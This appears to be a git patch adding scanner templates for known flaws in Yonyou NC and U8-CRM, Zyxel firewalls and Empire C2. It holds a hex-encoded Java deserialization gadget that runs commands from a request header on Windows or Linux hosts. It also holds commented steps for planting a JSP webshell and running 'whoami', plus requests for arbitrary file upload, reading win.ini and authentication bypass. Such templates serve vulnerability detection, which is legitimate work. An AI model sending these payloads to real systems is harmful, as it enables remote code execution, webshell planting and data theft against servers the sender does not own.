{{hex_decode('ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E0003787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C020000787000000001737200296F72672E6170616368652E78616C616E2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000749000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465784C000B5F617578436C617373657374002A4C6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00154C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000EF1CAFEBABE0000003200E30A0003000F0700DE0700120100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B01000A536F7572636546696C6501000C476164676574732E6A6176610C0004000507001301003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61640100106A6176612F6C616E672F4F626A65637401001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100106A6176612F6C616E672F54687265616407001501000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B0C001700180A0016001901000E67657454687265616447726F757001001928294C6A6176612F6C616E672F54687265616447726F75703B0C001B001C0A0016001D010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0C001F00200A000300210100077468726561647308002301000F6A6176612F6C616E672F436C6173730700250100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0C002700280A002600290100226A6176612F6C616E672F7265666C6563742F41636365737369626C654F626A65637407002B01000D73657441636365737369626C65010004285A29560C002D002E0A002C002F0100176A6176612F6C616E672F7265666C6563742F4669656C64070031010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C003300340A003200350100135B4C6A6176612F6C616E672F5468726561643B0700370100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B0C0039003A0A0016003B0100046578656308003D0100106A6176612F6C616E672F537472696E6707003F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C004100420A00400043010004687474700800450100067461726765740800470100126A6176612F6C616E672F52756E6E61626C6507004901000674686973243008004B01000768616E646C657208004D01001E6A6176612F6C616E672F4E6F537563684669656C64457863657074696F6E07004F01000D6765745375706572636C6173730C005100200A00260052010006676C6F62616C08005401000A70726F636573736F727308005601000E6A6176612F7574696C2F4C69737407005801000473697A650100032829490C005A005B0B0059005C0100152849294C6A6176612F6C616E672F4F626A6563743B0C0033005E0B0059005F01000372657108006101000B676574526573706F6E73650800630100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0C006500660A002600670100186A6176612F6C616E672F7265666C6563742F4D6574686F64070069010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C006B006C0A006A006D01000967657448656164657208006F01000C582D54304B454E2D494E46300800710100076973456D70747901000328295A0C007300740A004000750100097365745374617475730800770100116A6176612F6C616E672F496E7465676572070079010004545950450100114C6A6176612F6C616E672F436C6173733B0C007B007C09007A007D010004284929560C0004007F0A007A00800100076F732E6E616D650800820100106A6176612F6C616E672F53797374656D07008401000B67657450726F7065727479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C008600870A0085008801000B746F4C6F776572436173650C008A003A0A0040008B01000677696E646F7708008D010007636D642E65786508008F0100022F630800910100072F62696E2F73680800930100022D630800950100116A6176612F7574696C2F5363616E6E65720700970100186A6176612F6C616E672F50726F636573734275696C646572070099010016285B4C6A6176612F6C616E672F537472696E673B29560C0004009B0A009A009C010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0C009E009F0A009A00A00100116A6176612F6C616E672F50726F636573730700A201000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C00A400A50A00A300A6010018284C6A6176612F696F2F496E70757453747265616D3B29560C000400A80A009800A90100025C410800AB01000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C00AD00AE0A009800AF0100046E6578740C00B1003A0A009800B2010008676574427974657301000428295B420C00B400B50A004000B601002A6F72672E6170616368652E746F6D6361742E7574696C2E636F6465632E62696E6172792E4261736536340800B8010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0C00BA00BB0A002600BC01000C656E636F64654261736536340800BE0100025B420700C00100097365744865616465720800C2010007582D54304B454E0800C4010015284C6A6176612F6C616E672F537472696E673B29560C000400C60A004000C7010005285B4229560C000400C90A004000CA01001F6A6176612F6C616E672F4E6F537563684D6574686F64457863657074696F6E0700CC0100136A6176612E6E696F2E427974654275666665720800CE010004777261700800D00100116765744465636C617265644D6574686F640C00D200660A002600D3010007646F57726974650800D50100136A6176612F6C616E672F457863657074696F6E0700D70100156A6176612F6C616E672F54687265616447726F75700700D90100135B4C6A6176612F6C616E672F537472696E673B0700DB01000D537461636B4D61705461626C6501001F79736F73657269616C2F50776E6572323235373930313132353233373432340100214C79736F73657269616C2F50776E6572323235373930313132353233373432343B01002F6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700E00A00E1000F0021000200E1000000000002000100040005000100060000002F00010001000000052AB700E2B10000000200070000000600010000003500080000000C000100000005000900DF0000000800140005000100060000043A000A00190000031BA70003014C033DB8001AB6001E4E2DB600221224B6002A3A04190404B6003019042DB60036C000383A0503360615061905BEA202E019051506323A07190701A60006A702CA1907B6003C3A081908123EB600449A000D19081246B600449A0006A702AC1907B600221248B6002A3A04190404B6003019041907B600363A091909C1004A9A0006A702861909B60022124CB6002A3A04190404B6003019041909B600363A091909B60022124EB6002A3A04A7001A3A0A1909B60022B60053B60053124EB6002A3A04A70003190404B6003019041909B600363A091909B60022B600531255B6002A3A04A700143A0B1909B600221255B6002A3A04A70003190404B6003019041909B600363A091909B600221257B6002A3A04190404B6003019041909B60036C000593A0C03360D150D190CB9005D0100A201C5190C150DB9006002003A0E190EB600221262B6002A3A04190404B600301904190EB600363A0F190FB60022126403BD0026B60068190F03BD0003B6006E3A10190FB60022127004BD00265903124053B60068190F04BD00035903127253B6006EC000403A08190801A5000B1908B60076990006A701421910B60022127804BD00265903B2007E53B60068191004BD00035903BB007A591100C8B7008153B6006E571283B80089B6008C128EB6004499001906BD0040590312905359041292535905190853A7001606BD00405903129453590412965359051908533A11BB009859BB009A591911B7009DB600A1B600A7B700AA12ACB600B0B600B3B600B73A1212B9B800BD3A13191312BF04BD0026590312C153B600680104BD00035903191253B6006E3A141910B6002212C305BD002659031240535904124053B60068191005BD00035903BB00405912C5B700C8535904BB0040591914C000C1B700CB53B6006E57A700513A1512CFB800BD3A16191612D104BD0026590312C153B600D4191604BD00035903191253B6006E3A091910B6002212D604BD00265903191653B60068191004BD00035903190953B6006E57A70003043D1C990006A70009840D01A7FE351C990006A70014A7000B3A17A70006A70000840601A7FD1EA700083A18A70003B1000500A400B000B3005000D900E800EB00500237029A029D00CD00350301030400D800050312031500D8000100DD000000E5001B03FF002900070005010700DA070032070038010000FC0017070016FC001A07004002FC002507000369070050166007005010FF002F000E0005010700DA070032070038010700160700400700030000070059010000FE007E07000307000307000302FB0050520700DCFF008A00130005010700DA070032070038010700160700400700030000070059010700030700030700030700DC0700C100010700CDFB004DF9000106F8000506FF000200070005010700DA0700320700380100010700D804FF000200070005010700DA07003207003801000005FF00020002000500010700D8040002000D00000002000E000B0000000A000100020010000A00097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000078707371007E00003F4000000000000077080000001000000000787871007E000678')}} + + - | + POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Type: multipart/form-data; + X-T0KEN-INF0: expr 987843129+808922376 + Accept-Encoding: gzip, deflate + + {{hex_decode('ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E0003787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C020000787000000001737200296F72672E6170616368652E78616C616E2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000749000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465784C000B5F617578436C617373657374002A4C6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00154C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000EF1CAFEBABE0000003200E30A0003000F0700DE0700120100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B01000A536F7572636546696C6501000C476164676574732E6A6176610C0004000507001301003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61640100106A6176612F6C616E672F4F626A65637401001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100106A6176612F6C616E672F54687265616407001501000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B0C001700180A0016001901000E67657454687265616447726F757001001928294C6A6176612F6C616E672F54687265616447726F75703B0C001B001C0A0016001D010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0C001F00200A000300210100077468726561647308002301000F6A6176612F6C616E672F436C6173730700250100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0C002700280A002600290100226A6176612F6C616E672F7265666C6563742F41636365737369626C654F626A65637407002B01000D73657441636365737369626C65010004285A29560C002D002E0A002C002F0100176A6176612F6C616E672F7265666C6563742F4669656C64070031010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C003300340A003200350100135B4C6A6176612F6C616E672F5468726561643B0700370100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B0C0039003A0A0016003B0100046578656308003D0100106A6176612F6C616E672F537472696E6707003F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C004100420A00400043010004687474700800450100067461726765740800470100126A6176612F6C616E672F52756E6E61626C6507004901000674686973243008004B01000768616E646C657208004D01001E6A6176612F6C616E672F4E6F537563684669656C64457863657074696F6E07004F01000D6765745375706572636C6173730C005100200A00260052010006676C6F62616C08005401000A70726F636573736F727308005601000E6A6176612F7574696C2F4C69737407005801000473697A650100032829490C005A005B0B0059005C0100152849294C6A6176612F6C616E672F4F626A6563743B0C0033005E0B0059005F01000372657108006101000B676574526573706F6E73650800630100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0C006500660A002600670100186A6176612F6C616E672F7265666C6563742F4D6574686F64070069010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C006B006C0A006A006D01000967657448656164657208006F01000C582D54304B454E2D494E46300800710100076973456D70747901000328295A0C007300740A004000750100097365745374617475730800770100116A6176612F6C616E672F496E7465676572070079010004545950450100114C6A6176612F6C616E672F436C6173733B0C007B007C09007A007D010004284929560C0004007F0A007A00800100076F732E6E616D650800820100106A6176612F6C616E672F53797374656D07008401000B67657450726F7065727479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C008600870A0085008801000B746F4C6F776572436173650C008A003A0A0040008B01000677696E646F7708008D010007636D642E65786508008F0100022F630800910100072F62696E2F73680800930100022D630800950100116A6176612F7574696C2F5363616E6E65720700970100186A6176612F6C616E672F50726F636573734275696C646572070099010016285B4C6A6176612F6C616E672F537472696E673B29560C0004009B0A009A009C010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0C009E009F0A009A00A00100116A6176612F6C616E672F50726F636573730700A201000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C00A400A50A00A300A6010018284C6A6176612F696F2F496E70757453747265616D3B29560C000400A80A009800A90100025C410800AB01000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C00AD00AE0A009800AF0100046E6578740C00B1003A0A009800B2010008676574427974657301000428295B420C00B400B50A004000B601002A6F72672E6170616368652E746F6D6361742E7574696C2E636F6465632E62696E6172792E4261736536340800B8010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0C00BA00BB0A002600BC01000C656E636F64654261736536340800BE0100025B420700C00100097365744865616465720800C2010007582D54304B454E0800C4010015284C6A6176612F6C616E672F537472696E673B29560C000400C60A004000C7010005285B4229560C000400C90A004000CA01001F6A6176612F6C616E672F4E6F537563684D6574686F64457863657074696F6E0700CC0100136A6176612E6E696F2E427974654275666665720800CE010004777261700800D00100116765744465636C617265644D6574686F640C00D200660A002600D3010007646F57726974650800D50100136A6176612F6C616E672F457863657074696F6E0700D70100156A6176612F6C616E672F54687265616447726F75700700D90100135B4C6A6176612F6C616E672F537472696E673B0700DB01000D537461636B4D61705461626C6501001F79736F73657269616C2F50776E6572323235373930313132353233373432340100214C79736F73657269616C2F50776E6572323235373930313132353233373432343B01002F6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700E00A00E1000F0021000200E1000000000002000100040005000100060000002F00010001000000052AB700E2B10000000200070000000600010000003500080000000C000100000005000900DF0000000800140005000100060000043A000A00190000031BA70003014C033DB8001AB6001E4E2DB600221224B6002A3A04190404B6003019042DB60036C000383A0503360615061905BEA202E019051506323A07190701A60006A702CA1907B6003C3A081908123EB600449A000D19081246B600449A0006A702AC1907B600221248B6002A3A04190404B6003019041907B600363A091909C1004A9A0006A702861909B60022124CB6002A3A04190404B6003019041909B600363A091909B60022124EB6002A3A04A7001A3A0A1909B60022B60053B60053124EB6002A3A04A70003190404B6003019041909B600363A091909B60022B600531255B6002A3A04A700143A0B1909B600221255B6002A3A04A70003190404B6003019041909B600363A091909B600221257B6002A3A04190404B6003019041909B60036C000593A0C03360D150D190CB9005D0100A201C5190C150DB9006002003A0E190EB600221262B6002A3A04190404B600301904190EB600363A0F190FB60022126403BD0026B60068190F03BD0003B6006E3A10190FB60022127004BD00265903124053B60068190F04BD00035903127253B6006EC000403A08190801A5000B1908B60076990006A701421910B60022127804BD00265903B2007E53B60068191004BD00035903BB007A591100C8B7008153B6006E571283B80089B6008C128EB6004499001906BD0040590312905359041292535905190853A7001606BD00405903129453590412965359051908533A11BB009859BB009A591911B7009DB600A1B600A7B700AA12ACB600B0B600B3B600B73A1212B9B800BD3A13191312BF04BD0026590312C153B600680104BD00035903191253B6006E3A141910B6002212C305BD002659031240535904124053B60068191005BD00035903BB00405912C5B700C8535904BB0040591914C000C1B700CB53B6006E57A700513A1512CFB800BD3A16191612D104BD0026590312C153B600D4191604BD00035903191253B6006E3A091910B6002212D604BD00265903191653B60068191004BD00035903190953B6006E57A70003043D1C990006A70009840D01A7FE351C990006A70014A7000B3A17A70006A70000840601A7FD1EA700083A18A70003B1000500A400B000B3005000D900E800EB00500237029A029D00CD00350301030400D800050312031500D8000100DD000000E5001B03FF002900070005010700DA070032070038010000FC0017070016FC001A07004002FC002507000369070050166007005010FF002F000E0005010700DA070032070038010700160700400700030000070059010000FE007E07000307000307000302FB0050520700DCFF008A00130005010700DA070032070038010700160700400700030000070059010700030700030700030700DC0700C100010700CDFB004DF9000106F8000506FF000200070005010700DA0700320700380100010700D804FF000200070005010700DA07003207003801000005FF00020002000500010700D8040002000D00000002000E000B0000000A000100020010000A00097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000078707371007E00003F4000000000000077080000001000000000787871007E000678')}} + + + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains(header_1,"X-T0ken") && contains(header_1,"MTc5Njc2NTUwNg==")' + - 'status_code_2 == 200 && contains(header_2,"X-T0ken") && contains(header_2,"MTc5Njc2NTUwNQ==")' + condition: or + + + +# 利用直接改头部 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml new file mode 100644 index 0000000000..c7ae06c1f9 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml @@ -0,0 +1,42 @@ +id: yonyou-nc-uapjs-jsinvoke-fileupload + +info: + name: Yonyou NC uapjs jsinvoke 文件上传漏洞 + author: SleepingBag945 + severity: critical + description: 用友NC 及 NCC系统存在任意方法调用漏洞,通过uapjs (jsinvoke)利用漏洞可调用危险方法造成攻击。 + tags: yonyou + +http: + - raw: + - | + POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig", + "parameterTypes":["java.lang.Object","java.lang.String"], + "parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]} + + - | + GET /{{randstr_1}}.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code_1 == 200 + - status_code_2 == 200 && contains(body_2,"{{randstr_2}}") + condition: and + + +# POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 +# Host: {{Hostname}} + +# {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]} + + +# POST /cmdb.jsp?error=bsh.Interpreter HTTP/1.1 +# Host: {{Hostname}} + +# cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream()) \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml new file mode 100644 index 0000000000..08ac1655b3 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml @@ -0,0 +1,23 @@ +id: yonyou-u8-crm-getemaildata-file-read + +info: + name: 用友U8-CRM getemaildata 任意文件读取 + author: SleepingBag945 + severity: high + description: | + 用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件读取漏洞 + metadata: + tags: yonyou + +http: + - raw: + - | + POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + matchers: + - type: dsl + dsl: + - status_code_1 == 200 && contains(body_1,"for 16-bit app support") + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-upload.yaml new file mode 100644 index 0000000000..fe796c2faa --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-upload.yaml @@ -0,0 +1,39 @@ +id: yonyou-u8-crm-getemaildata-file-upload + +info: + name: 用友U8-CRM getemaildata 任意文件上传 + author: SleepingBag945 + severity: critical + description: | + 用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器权限,攻击服务器 + metadata: + tags: yonyou + +http: + - raw: + - | + POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; + + matchers: + - type: dsl + dsl: + - status_code_1 == 200 && contains(body_1,"Database error") && contains(body_1,"Microsoft OLE DB Provider for SQL Server") + condition: and + + +# POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1 +# Host: +# Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ + +# ------WebKitFormBoundarykS5RKgl8t3nwInMQ +# Content-Disposition: form-data; name="file"; filename="test.php " +# Content-Type: text/plain + +# + +# ------WebKitFormBoundarykS5RKgl8t3nwInMQ + +# 访问十六进制减一 +# /tmpfile/updD24D.tmp.php \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-ufida-nc-username-leak.yaml b/http/vulnerabilities/yonyou/yonyou-ufida-nc-username-leak.yaml new file mode 100644 index 0000000000..e353e2aced --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-ufida-nc-username-leak.yaml @@ -0,0 +1,23 @@ +id: yonyou-ufida-nc-username-leak + +info: + name: yonyou-ufida-nc-username-leak + author: SleepingBag945 + severity: medium + description: 可获取到所有用户,爆破账号获取cookie,后台可文件上传 + reference: + - https://mp.weixin.qq.com/s/Lu6Zd9LP3PQsb8uzTIcANQ + tags: yonyou,nc + +http: + - method: GET + path: + - "{{BaseURL}}/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease" + matchers-condition: and + matchers: + - type: word + words: + - "目标用户" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/zyxel/CVE-2022-0342.yaml b/http/vulnerabilities/zyxel/CVE-2022-0342.yaml new file mode 100644 index 0000000000..eed1c60166 --- /dev/null +++ b/http/vulnerabilities/zyxel/CVE-2022-0342.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-0342 + +info: + name: CVE-2022-0342 Zyxel Authentication Bypass + author: SleepingBag945 + severity: critical + description: Zyxel USG/ZyWALL是中国合勤科技(Zyxel)公司的一款防火墙。ZyWALL 4.20版本至4.70版本、USG FLEX 4.50版本至5.20版本、ATP 4.32版本至5.20版本、VPN 4.30版本至5.20版本、NSG 1.20版本至1.33 Patch 4版本存在安全漏洞,攻击者利用该漏洞绕过Web身份验证并获得设备的管理访问权限。 + tags: zyxel + + +http: + - raw: + - | + GET /cgi-bin/export-cgi?category=config&arg0=startup-config.conf HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip, deflate + Connection: close + + + + + + matchers-condition: and + matchers: + - type: word + words: + - "interface-name" + condition: and + + - type: word + words: + - "text/zyxel" + part: header + condition: and + + - type: status + status: + - 200 + +# https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/ \ No newline at end of file From 19b2eee6e8deb5d2d599b8ac70c7793e095b9c0f Mon Sep 17 00:00:00 2001 From: Pugalarasan <75373225+0xPugazh@users.noreply.github.com> Date: Sat, 19 Aug 2023 13:23:18 +0530 Subject: [PATCH 0005/1090] Create api-notolytix.yaml --- http/token-spray/api-notolytix.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/token-spray/api-notolytix.yaml diff --git a/http/token-spray/api-notolytix.yaml b/http/token-spray/api-notolytix.yaml new file mode 100644 index 0000000000..cbadfbb759 --- /dev/null +++ b/http/token-spray/api-notolytix.yaml @@ -0,0 +1,27 @@ +id: api-notolytix + +info: + name: Notolytix API Test + author: 0xPugazh + severity: info + reference: + - https://notolytix.com/ + tags: notolytix,token-spray + +self-contained: true +http: + - method: GET + path: + - "https://api.notolytix.com/1.0/deviceid" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - 'realIp' + - 'route' + - 'deviceId' + - 'personaId' + condition: and From 2948e3726701c94e688fff20f33e8dadff20407c Mon Sep 17 00:00:00 2001 From: parzival Date: Sat, 19 Aug 2023 22:01:28 -0700 Subject: [PATCH 0006/1090] Update empirec2-default-login.yaml updating the empirec2 default login template --- .../empire/empirec2-default-login.yaml | 43 +++++++++++-------- 1 file changed, 25 insertions(+), 18 deletions(-) diff --git a/http/default-logins/empire/empirec2-default-login.yaml b/http/default-logins/empire/empirec2-default-login.yaml index 3063d57808..3260aa78a9 100644 --- a/http/default-logins/empire/empirec2-default-login.yaml +++ b/http/default-logins/empire/empirec2-default-login.yaml @@ -1,17 +1,14 @@ id: empirec2-default-login info: - name: Empire C2 Default Admin Login - Detect - author: clem9669 + name: Empire C2 / Starkiller Interface - Default Login + author: parzival severity: high - description: Empire C2 contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + description: | + Empire C2 / Starkiller Default Administrator Credentials Discovered. reference: - https://github.com/BC-SECURITY/Empire - - https://bc-security.gitbook.io/empire-wiki/quickstart/configuration/server - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 + - https://github.com/BC-SECURITY/empire-docs/blob/main/restful-api/README.md metadata: max-request: 1 verified: true @@ -20,30 +17,40 @@ info: http: - raw: - | - POST /api/admin/login HTTP/1.1 + POST /token HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZwyedGcQU4FrcFV + Accept: application/json, text/plain, */* - {"username":"{{user}}","password":"{{pass}}"} + ------WebKitFormBoundaryoZwyedGcQU4FrcFV + Content-Disposition: form-data; name="username" + + 